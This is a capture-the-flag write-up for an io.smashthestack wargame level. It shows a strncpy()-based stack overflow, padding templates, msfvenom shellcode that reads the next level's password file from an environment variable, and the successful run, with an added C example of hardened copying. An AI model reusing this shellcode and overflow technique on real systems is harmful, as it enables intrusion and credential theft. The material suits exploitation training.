Level 6 from io.smashthestack.org:
Input templates:
first: AAAAAAAAAAAAAAAAAAAA (20 + \n)
last: BBBBBBBBBBBBBBCCCCC (19 + \n)
If input is greater than 20, the strncpy() in prompt_name() will truncate the string and it won't slap on a \0.
In prompt_full_name(), after reading both prompts, first = first + last, so the first strcpy() will copy 39 bytes into full name, plus 1 space, then 19 more bytes from the second strcpy() (enough to overwrite EIP).
Note: Need to fill the first read()'s buffer completely, else the second read() will pick up where it left off, mucking things up. New input template:
perl -e 'print "AAAAAAAAAAAAAAAAAAAA\n" . "Z" x 4075 . "BBBBBBBBBBBBBB\x01\x02\x03\x04C\n"' > in
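To show the bug class from the defender's side, here is an added C example (not the level's source) that reproduces the strncpy() non-termination on a 20-byte name buffer and, beside it, the bounded copy and concatenation that prompt_name() and prompt_full_name() should have used. NAME_LEN and the function names are assumptions.

```c
#include <stdio.h>
#include <string.h>

#define NAME_LEN 20  /* assumed size of the level's first/last name buffers */

/* Copies src the way the level's prompt_name() does: strncpy() with the
 * full buffer size and no explicit terminator. Returns 1 when the result
 * is NOT NUL-terminated (src is NAME_LEN bytes or longer), 0 otherwise. */
int unterminated_after_strncpy(const char *src)
{
    char name[NAME_LEN];
    strncpy(name, src, NAME_LEN);
    return memchr(name, '\0', NAME_LEN) == NULL;
}

/* Hardened copy: truncates to dstsz-1 bytes and always NUL-terminates,
 * so a later strcpy()/strlen() can never run past the buffer. */
void copy_name(char *dst, size_t dstsz, const char *src)
{
    strncpy(dst, src, dstsz - 1);  /* assumes dstsz >= 1 */
    dst[dstsz - 1] = '\0';
}

/* Hardened full-name build: every copy is bounded and the caller is told
 * when the combined name would not fit instead of the stack being
 * overwritten. Returns 0 on success, -1 on truncation. */
int build_full_name(char *out, size_t outsz,
                    const char *first, const char *last)
{
    char f[NAME_LEN], l[NAME_LEN];
    copy_name(f, sizeof f, first);
    copy_name(l, sizeof l, last);
    int n = snprintf(out, outsz, "%s %s", f, l);
    if (n < 0 || (size_t)n >= outsz)
        return -1;
    return 0;
}
```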
Put shellcode into EGG environment variable, shellcode was very picky (no actual shells allowed):
level6@io:/tmp/dennis6$ cat sc.pl
my $nops = "\x90" x 50;
#dennis@ipa:~/msf3$ ./msfvenom -p linux/x86/exec -f pl -b '\x00' CMD='cat /home/level7/.pass'
#[*] x86/shikata_ga_nai succeeded with size 85 (iteration=1)
my $sc =
"\xdb\xd3\xd9\x74\x24\xf4\xbb\xc6\x34\x4f\xa3\x58\x29\xc9" .
"\xb1\x0f\x31\x58\x19\x83\xe8\xfc\x03\x58\x15\x24\xc1\x25" .
"\xa8\xf0\xb3\xe8\xc8\x68\xe9\x6f\x9c\x8f\x99\x40\xed\x27" .
"\x5a\xf7\x3e\xd5\x33\x69\xc8\xfa\x96\x9d\xdd\xfc\x16\x5e" .
"\x81\x9d\x62\x7e\x6a\x35\xe4\x13\x11\xea\x96\x8e\xaf\x91" .
"\x0a\x66\x7f\x77\xa3\xe9\x0c\xf4\x43\xbd\xa1\x73\xa2\x8c" .
"\xc6";
print $nops.$sc
level6@io:/tmp/dennis6$ export EGG=`perl sc.pl`
Get address of the EGG environment variable:
level6@io:/tmp/dennis6$ cat le.c
#include <stdio.h>
#include <stdlib.h>
/* progname must be the same length as /levels/level06, so that the
 * environment strings land at the same stack address in both programs */
int main()
{
char *envaddr;
envaddr = getenv("EGG");
printf("EGG is at %p\n", envaddr);
return 0;
}
>>> len("/levels/level06")
15
>>> len("/tmp/dennis6/le")
15
level6@io:/tmp/dennis6$ ./le
EGG is at 0xbffffe97
Adjust the input template with return address:
level6@io:/tmp/dennis6$ perl -e 'print "AAAAAAAAAAAAAAAAAAAA\n" . "Z" x 4075 . "BBBBBBBBBBBBBB\x97\xfe\xff\xbfC\n"' > exp
level6@io:/tmp/dennis6$ /levels/level06 < exp
Please enter your first name:
Please enter your last name:
Welcome, AAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBB???C BBBBBBBBBBBBBB???C
shhh don't snitch
Can you please explain why the 4705 bytes of padding is required when the arguments are passed from file and not when passed through command-line?